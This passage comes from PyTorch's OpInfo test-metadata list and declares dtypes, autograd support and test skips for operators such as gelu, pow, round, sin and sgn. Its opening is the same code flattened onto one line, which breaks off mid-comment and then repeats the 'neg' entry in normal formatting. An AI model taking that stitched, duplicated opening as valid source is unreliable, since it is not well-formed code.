# DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # # TypeError: igammac(): argument 'input' (position 1) must be Tensor, not float # DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs'), # )), OpInfo('nn.functional.softshrink', aten_name="softshrink", aten_backward_name='softshrink_backward', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, ), OpInfo('nn.functional.hardshrink', aten_name="hardshrink", aten_backward_name='hardshrink_backward', dtypes=floating_types_and(torch.bfloat16,), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::hardshrink"]), OpInfo('nn.functional.hardtanh', aten_name="hardtanh", aten_backward_name='hardtanh_backward', dtypes=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.bfloat16), backward_dtypes=all_types(), dtypesIfCUDA=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::hardtanh"], ), OpInfo('nn.functional.gelu', aten_name="gelu", aten_backward_name='gelu_backward', ref=reference_gelu if TEST_SCIPY else _NOTHING, supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_gelu, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::gelu"], skips=( # AssertionError: Tensor-likes are not close! 
# May not replicate in CI DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'),)), OpInfo('nn.functional.relu6', aten_name="relu6", dtypes=all_types_and(torch.bfloat16), backward_dtypes=floating_types(), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::relu6"]), OpInfo('mm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_mm), OpInfo('mode', op=torch.mode, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Resized a non-empty tensor but did not warn about it DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), ), sample_inputs_func=sample_inputs_mode,), MvlGammaInfo(variant_test_name='mvlgamma_p_1', domain=(1, None), skips=skips_mvlgamma() + \ (DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)),), sample_kwargs=lambda device, dtype, input: ({'p': 1}, {'d': 1})), MvlGammaInfo(variant_test_name='mvlgamma_p_3', domain=(2, None), skips=skips_mvlgamma(skip_redundant=True) + ( DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)), ), sample_kwargs=lambda device, dtype, input: ({'p': 3}, {'d': 3})), MvlGammaInfo(variant_test_name='mvlgamma_p_5', domain=(3, None), skips=skips_mvlgamma(skip_redundant=True) + ( DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)), ), sample_kwargs=lambda device, dtype, input: ({'p': 5}, {'d': 5})), BinaryUfuncInfo('ne', ref=np.not_equal, aliases=('not_equal',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False), OpInfo('narrow', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_narrow), UnaryUfuncInfo('neg', aliases=('negative', ), ref=np.negative, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), error_inputs_func=error_inputs_neg, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True, skips=( # RuntimeError: "nonzero_count_cpu" not implemented for 
    UnaryUfuncInfo('neg',
                   aliases=('negative', ),
                   ref=np.negative,
                   dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf),
                   error_inputs_func=error_inputs_neg,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   assert_autodiffed=True,
                   skips=(
                       # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency',
                                    dtypes=(torch.chalf,),),
                       # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace',
                                    dtypes=(torch.chalf,),),
                       # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out',
                                    dtypes=(torch.chalf,),),
                       # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR',
                                    'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,),)
                   )),
    OpInfo('dist',
           op=torch.dist,
           dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16),
           supports_out=False,
           supports_forward_ad=True,
           # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got:
           # Could not allocate memory to change Tensor SizesAndStrides!
           check_batched_forward_grad=False,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_dist),
    OpInfo('outer',
           op=torch.outer,
           aliases=('ger', ),
           dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16),
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_outer,),
    OpInfo('ormqr',
           op=torch.ormqr,
           dtypes=floating_and_complex_types(),
           supports_autograd=False,
           sample_inputs_func=sample_inputs_ormqr,
           error_inputs_func=error_inputs_ormqr,
           decorators=[skipCUDAIfNoCusolver, skipCPUIfNoLapack],
           skips=(
               # ormqr does not support forward when complex inputs require grad
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'),
               # Strides are not the same!
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
           )),
    OpInfo('permute',
           ref=np.transpose,
           dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf),
           supports_out=False,
           assert_autodiffed=True,
           autodiff_fusible_nodes=[],  # aliases inputs, shouldn't be fused
           autodiff_nonfusible_nodes=[],  # aliases inputs, shouldn't be fused
           assert_jit_shape_analysis=True,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_permute,
           reference_inputs_func=reference_inputs_permute),
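    # The lhs_/rhs_make_tensor_kwargs dicts on the binary-ufunc entries below are
    # (presumably) forwarded to make_tensor when the test suite generates operands,
    # so low=0 keeps the sampled bases and integer exponents nonnegative.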
    BinaryUfuncInfo('pow',
                    dtypes=all_types_and_complex_and(torch.half, torch.bfloat16),
                    dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf),
                    ref=np.power,
                    # Due to AVX2 currently not being fully supported for Float16, log_vml_cpu can't be enabled
                    # for Float16, causing this test to fail. pow's autograd for Float16 is thus currently
                    # unsupported on CPU.
                    backward_dtypes=floating_and_complex_types_and(torch.bfloat16),
                    backward_dtypesIfCUDA=floating_and_complex_types_and(torch.bfloat16, torch.half, torch.chalf),
                    supports_inplace_autograd=False,
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    assert_autodiffed=True,
                    supports_one_python_scalar=True,
                    # Integer types do not support negative exponents
                    rhs_make_tensor_kwargs=dict(low=0),
                    # Raising negative real numbers to fractional powers is not supported
                    lhs_make_tensor_kwargs=dict(low=0),
                    decorators=(
                        DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05)}),
                                     'TestBinaryUfuncs', 'test_reference_numerics'),
                        DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05),
                                                        torch.complex128: tol(atol=1e-4, rtol=1.3e-05)}),
                                     'TestBinaryUfuncs', 'test_scalar_support'),
                    ),
                    skips=(
                        # Skipping integers because they are being raised to negative powers causing an error
                        DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_small_values',
                                     dtypes=[torch.int8, torch.int16, torch.int32, torch.int64]),
                        DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_large_values',
                                     dtypes=[torch.int16, torch.int32, torch.int64]),
                        # FIXME Complex values error with: Greatest absolute difference: nan at index
                        # Ref: https://github.com/pytorch/pytorch/issues/76853
                        # For `chalf`, reference computation in `numpy` is computed in `cfloat`.
                        # Output of `chalf` saturates to `inf` quicker than reference due to its small range
                        # which leads to failure of this test.
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics',
                                     dtypes=(torch.complex32,)),
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values',
                                     dtypes=(torch.complex32, torch.complex64, torch.complex128)),
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_large_values',
                                     dtypes=(torch.complex32, torch.complex64, torch.complex128)),
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values',
                                     dtypes=(torch.complex32, torch.complex64, torch.complex128)),
                    )),
    BinaryUfuncInfo('float_power',
                    ref=np.float_power,
                    dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.bool),
                    promotes_int_to_float=True,
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    supports_one_python_scalar=True,
                    # Integer types do not support negative exponents
                    rhs_make_tensor_kwargs=dict(low=0),
                    # Raising negative real numbers to fractional powers is not supported
                    lhs_make_tensor_kwargs=dict(low=0),
                    decorators=(
                        DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05),
                                                        torch.complex128: tol(atol=1e-4, rtol=1.3e-05)}),
                                     'TestBinaryUfuncs', 'test_scalar_support'),
                    ),
                    skips=(
                        # FIXME
                        # AssertionError: Object comparison failed: torch.float64 != torch.float32
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'),
                        # -3.43399e+38 is outside the range of representable values of type 'float'
                        DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'),
                        # Complex values error with: Greatest absolute difference: nan at index
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values',
                                     dtypes=[torch.complex64, torch.complex128]),
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_large_values',
                                     dtypes=[torch.complex64, torch.complex128]),
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values',
                                     dtypes=[torch.complex64, torch.complex128]),
                    )),
    OpInfo('qr',
           op=torch.qr,
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_linalg_qr_geqrf,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           # In-place ops
           check_batched_gradgrad=False,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]),
    UnaryUfuncInfo('rad2deg',
                   ref=np.degrees,
                   decorators=(precisionOverride({torch.bfloat16: 7e-1,
                                                  torch.float16: 7e-1}),),
                   dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16),
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/pull/51283#issuecomment-770614273
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=[torch.bfloat16]),
                   ),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True),
    UnaryUfuncInfo('real',
                   ref=np.real,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf),
                   supports_out=False,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   # See https://github.com/pytorch/pytorch/issues/66357
                   check_batched_forward_grad=False,
                   skips=(
                       # Skip since real and imag don't have out variants.
                       DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'),
                   )),
    OpInfo(
        "roll",
        ref=np.roll,
        dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half),
        error_inputs_func=error_inputs_roll,
        supports_out=False,
        supports_forward_ad=True,
        supports_fwgrad_bwgrad=True,
        sample_inputs_func=sample_inputs_roll,
        decorators=(onlyNativeDeviceTypes,),
    ),
    OpInfo(
        "rot90",
        dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half),
        error_inputs_func=error_inputs_rot90,
        supports_out=False,
        supports_forward_ad=True,
        supports_fwgrad_bwgrad=True,
        sample_inputs_func=sample_inputs_rot90,
    ),
    # To test reference numerics against multiple values of argument `decimals`,
    # we make multiple OpInfo entries with each entry corresponding to different value of decimals.
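    # The variant_test_name strings on the entries below are embedded into the generated
    # test names (e.g. something like test_reference_numerics_small_round_decimals_0_cpu_float32,
    # illustrative only), giving each decimals value an independently skippable test set.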
    UnaryUfuncInfo('round',
                   ref=np.round,
                   aliases=('special.round',),
                   dtypes=floating_types_and(torch.bfloat16),
                   dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   assert_autodiffed=True,),
    UnaryUfuncInfo('round',
                   ref=np.round,
                   variant_test_name='decimals_0',
                   aliases=('special.round',),
                   dtypes=floating_types_and(torch.bfloat16),
                   dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16),
                   sample_kwargs=lambda device, dtype, input: ({'decimals': 0}, {'decimals': 0}),
                   sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': 0}),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   assert_autodiffed=False,
                   supports_sparse_csr=False),
    UnaryUfuncInfo('round',
                   ref=np.round,
                   variant_test_name='decimals_3',
                   aliases=('special.round',),
                   dtypes=floating_types_and(torch.bfloat16),
                   dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16),
                   sample_kwargs=lambda device, dtype, input: ({'decimals': 3}, {'decimals': 3}),
                   sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': 3}),
                   skips=(
                       # test_ops already tested for this overload with `decimals_0` opinfo entry
                       DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestJit'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits'),
                   ),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   assert_autodiffed=False,
                   supports_sparse_csr=False),
    UnaryUfuncInfo('round',
                   ref=np.round,
                   variant_test_name='decimals_neg_3',
                   aliases=('special.round',),
                   dtypes=floating_types_and(torch.bfloat16),
                   dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16),
                   sample_kwargs=lambda device, dtype, input: ({'decimals': -3}, {'decimals': -3}),
                   sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': -3}),
                   skips=(
                       # test_ops already tested for this overload with `decimals_0` opinfo entry
                       DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestJit'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits'),
                   ),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   assert_autodiffed=False,
                   supports_sparse_csr=False),
    UnaryUfuncInfo('sin',
                   ref=np.sin,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16),
                   # TODO: Add torch.chalf backward dtype support. Currently, we get:
                   # AssertionError: The supported dtypes for sin on device type cuda are incorrect!
                   # The following dtypes did not work in backward but are listed by the OpInfo: {torch.complex32}.
                   backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16),
                   assert_autodiffed=True,
                   handles_large_floats=False,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   skips=(
                       # Fails on CUDA but passes on ROCm
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=(torch.cdouble,), device_type='cuda'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu',
                                    active_if=IS_WINDOWS),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu',
                                    active_if=IS_WINDOWS),
                       DecorateInfo(unittest.skip("Skipped! sparse backward not supported"),
                                    'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'),
                       # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency',
                                    dtypes=(torch.chalf,)),
                       # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace',
                                    dtypes=(torch.chalf,)),
                       # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out',
                                    dtypes=(torch.chalf,)),
                       # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR',
                                    'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)),
                   ),
                   decorators=(precisionOverride({torch.bfloat16: 1e-2}),)),
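    # np_sinc_with_fp16_as_fp32 (the reference for `sinc` below) presumably evaluates
    # float16 inputs in float32 before casting back; the name suggests numpy's
    # half-precision sinc is too coarse to compare against directly. An inference from
    # the helper's name, not a verified claim.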
    UnaryUfuncInfo('sinc',
                   ref=np_sinc_with_fp16_as_fp32,
                   aliases=('special.sinc',),
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16),
                   handles_large_floats=False,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   decorators=(precisionOverride({torch.bfloat16: 1e-2,
                                                  torch.float16: 1e-2}),),
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/issues/49133
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    dtypes=[torch.cfloat]),
                   )),
    UnaryUfuncInfo('sinh',
                   ref=np_unary_ufunc_integer_promotion_wrapper(np.sinh),
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16),
                   assert_autodiffed=True,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   decorators=(precisionOverride({torch.float16: 1e-2}),),
                   skips=(
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    device_type='cpu', dtypes=[torch.cfloat, torch.cdouble],
                                    active_if=(IS_MACOS or IS_WINDOWS)),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.cfloat, torch.cdouble],
                                    active_if=(IS_MACOS or IS_WINDOWS)),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=(torch.cdouble,)),
                       # Reference: https://github.com/pytorch/pytorch/issues/48641
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.int8]),
                       DecorateInfo(unittest.skip("Skipped! sparse backward not supported"),
                                    'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'),
                   )),
    UnaryUfuncInfo('sign',
                   ref=reference_sign,
                   dtypes=all_types_and(torch.bool, torch.bfloat16, torch.half),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.half),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/issues/41245
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=[torch.bfloat16, torch.float16, torch.float32, torch.float64]),
                   )),
    UnaryUfuncInfo('sgn',
                   ref=reference_sgn,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf),
                   backward_dtypes=floating_and_complex_types_and(torch.bfloat16, torch.half),
                   backward_dtypesIfCUDA=floating_and_complex_types_and(torch.bfloat16, torch.half, torch.chalf),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/issues/41245
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=[torch.bfloat16, torch.float16, torch.float32, torch.float64]),
                       # Reference: https://github.com/pytorch/pytorch/issues/53958
                       # Test fails in comparison on Nan as the `equal_nan` is True for
                       # comparing the CPU tensors.
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    device_type='cpu', dtypes=[torch.complex64, torch.complex128]),
                       # Reference: https://github.com/pytorch/pytorch/issues/48486
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.complex64]),
                       # The complex formula might be wrong
                       DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD',
                                    dtypes=complex_types()),
                       # Passes for float, but for complex - Need: _s_where
                       DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad',
                                    dtypes=complex_types()),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_forward_mode_AD',
                                    dtypes=complex_types()),
                       DecorateInfo(unittest.skip("Skipped! sparse backward not supported"),
                                    'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'),
                       # nonzero_count not implemented
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency',
                                    dtypes=(torch.chalf,)),
                       # nonzero_count not implemented
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace',
                                    dtypes=(torch.chalf,)),
                       # nonzero_count not implemented
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out',
                                    dtypes=(torch.chalf,)),
                       # add_out_op2_sparse_csr
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR',
                                    'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)),
                   )),
    OpInfo('split',
           dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf),
           sample_inputs_func=partial(sample_inputs_split, list_args=False),
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           supports_out=False,
           autodiff_fusible_nodes=[],  # aliases inputs, shouldn't be fused
           autodiff_nonfusible_nodes=[],  # aliases inputs, shouldn't be fused
           assert_autodiffed=True),
    OpInfo('split',
           # Cannot declare this aten_name because of
           # test_variant_consistency_jit_split_list_args_cpu_float32
           decomp_aten_name='split_with_sizes',
           variant_test_name='list_args',
           dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool),
           sample_inputs_func=partial(sample_inputs_split, list_args=True),
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           supports_out=False),
    OpInfo('split_with_sizes',
           dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf),
           sample_inputs_func=sample_inputs_split_with_sizes,
           autodiff_fusible_nodes=[],  # aliases inputs, shouldn't be fused
           autodiff_nonfusible_nodes=[],  # aliases inputs, shouldn't be fused
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           assert_autodiffed=True),
    BinaryUfuncInfo('__radd__',
                    op=torch.Tensor.__radd__,
                    dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool),
                    supports_out=False,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),
                        DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',),
                    ),
                    assert_autodiffed=True,
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    autodiff_nonfusible_nodes=['aten::add'],),
    BinaryUfuncInfo('__rdiv__',
                    op=torch.Tensor.__rdiv__,
                    dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool),
                    promotes_int_to_float=True,
                    lhs_make_tensor_kwargs={'exclude_zero': True},
                    supports_out=False,
                    skips=(
                        # https://github.com/pytorch/pytorch/issues/76806
                        DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'),
                        DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                        DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',),
                    ),
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    assert_autodiffed=True,
                    autodiff_nonfusible_nodes=['aten::mul', 'aten::reciprocal'],),
    BinaryUfuncInfo('__rmul__',
                    op=torch.Tensor.__rmul__,
                    dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool),
                    supports_out=False,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                        DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',),
                    ),
                    assert_autodiffed=True,
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    autodiff_nonfusible_nodes=['aten::mul'],),
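    # The reflected-dunder (__r*__) entries in this block bind op to torch.Tensor methods
    # rather than torch.* callables; as far as I can tell that is why each one carries the
    # TestNormalizeOperators test_normalize_operator_exhaustive expectedFailure -- the
    # normalization pass has no torch-namespace function to map these back to.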
    BinaryUfuncInfo('__rand__',
                    op=torch.Tensor.__rand__,
                    dtypes=integral_types_and(torch.bool),
                    supports_out=False,
                    supports_autograd=False,
                    supports_forward_ad=True,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                    )),
    BinaryUfuncInfo('__ror__',
                    op=torch.Tensor.__ror__,
                    dtypes=integral_types_and(torch.bool),
                    supports_out=False,
                    supports_autograd=False,
                    supports_forward_ad=True,
